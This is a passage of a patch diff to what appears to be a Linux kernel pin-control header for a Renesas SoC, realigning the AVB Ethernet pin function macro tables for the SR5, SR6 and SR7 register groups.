++#define IP0SR5_7_4	FM(AVB2_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_11_8	FM(AVB2_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_15_12	FM(AVB2_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_19_16	FM(AVB2_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_23_20	FM(AVB2_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_27_24	FM(AVB2_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_31_28	FM(AVB2_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR5_3_0	FM(AVB2_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_7_4	FM(AVB2_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_11_8	FM(AVB2_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_15_12	FM(AVB2_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_19_16	FM(AVB2_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_23_20	FM(AVB2_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_27_24	FM(AVB2_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_31_28	FM(AVB2_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR5_3_0	FM(AVB2_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_7_4	FM(AVB2_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_11_8	FM(AVB2_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_15_12	FM(AVB2_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_19_16	FM(AVB2_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR6 */
+-/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR7 */
+-/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
